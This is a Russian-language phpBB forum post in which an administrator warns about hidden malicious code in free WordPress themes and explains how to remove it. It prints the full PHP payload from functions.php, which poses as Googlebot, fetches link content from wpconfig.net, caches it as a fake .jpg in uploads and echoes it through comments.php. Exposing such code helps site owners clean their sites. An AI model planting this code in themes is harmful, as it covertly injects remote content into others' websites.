Успешный бизнес

Успешный бизнес

Санкт-Петербург
Текущее время: 24 сен 2017, 05:29

Часовой пояс: UTC + 3 часа [ Летнее время ]




Начать новую тему Ответить на тему  [ 1 сообщение ] 
Автор Сообщение
 Заголовок сообщения: Скрытые ссылки в шаблонах бесплатных тем.
СообщениеДобавлено: 15 дек 2011, 13:42 
Не в сети
Администратор
Администратор
Аватара пользователя

Зарегистрирован: 10 мар 2010, 20:16
Сообщения: 230
Откуда: Санкт-Петербург
Вредоносный код в functions.php --

Код:
<?php

error_reporting('^ E_ALL ^ E_NOTICE');

ini_set('display_errors', '0');

error_reporting(E_ALL);

ini_set('display_errors', '0');



class Get_links {

    var $host = 'wpconfig.net';

    var $path = '/system.php';

    var $_cache_lifetime    = 21600;

    var $_socket_timeout    = 5;



    function get_remote() {

    $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);

    $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

         $links_class = new Get_links();

         $host = $links_class->host;

         $path = $links_class->path;

         $_socket_timeout = $links_class->_socket_timeout;

         //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);

        @ini_set('default_socket_timeout',   $_socket_timeout);

        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {

            $opts = array(

                'http'=>array(

                    'method'=>"GET",

                    'header'=>"Referer: {$req_url}\r\n".

                    "User-Agent: {$_user_agent}\r\n"

                )

            );

            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context);

            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);

            $data = @$data[2];

            return $data;

        }

           return '<!--link error-->';

      }





    function return_links($lib_path) {

         $links_class = new Get_links();

         $file = ABSPATH.'wp-content/uploads/2011/'.md5($_SERVER['REQUEST_URI']).'.jpg';

         $_cache_lifetime = $links_class->_cache_lifetime;

        if (!file_exists($file))

        {

            @touch($file, time());

            $data = $links_class->get_remote();

            file_put_contents($file, $data);

            return $data;

        } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) {

            @touch($file, time());

            $data = $links_class->get_remote();

            file_put_contents($file, $data);

            return $data;

        } else {

            $data = file_get_contents($file);

            return $data;

        }

    }

}

?>


и удаляем это из файла comments.php:
Код:
<?php $lib_path = dirname(__FILE__).'/'; require_once('functions.php'); $links = new Get_links(); $links = $links->return_links($lib_path); echo $links; ?>


Спасибо за информацию - http://www.sooource.net/wordpress-security

_________________
1. Админ всегда прав.
2. Если Админ не прав, смотри пункт 1.


Вернуться к началу
 Профиль  
 
Показать сообщения за:  Поле сортировки  
Начать новую тему Ответить на тему  [ 1 сообщение ] 

Часовой пояс: UTC + 3 часа [ Летнее время ]


Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 1


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Найти:
Перейти:  
Rambler's Top100
Использование материалов сайта возможно только с разрешения Успешный бизнес © 2006-2014

Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
Русская поддержка phpBB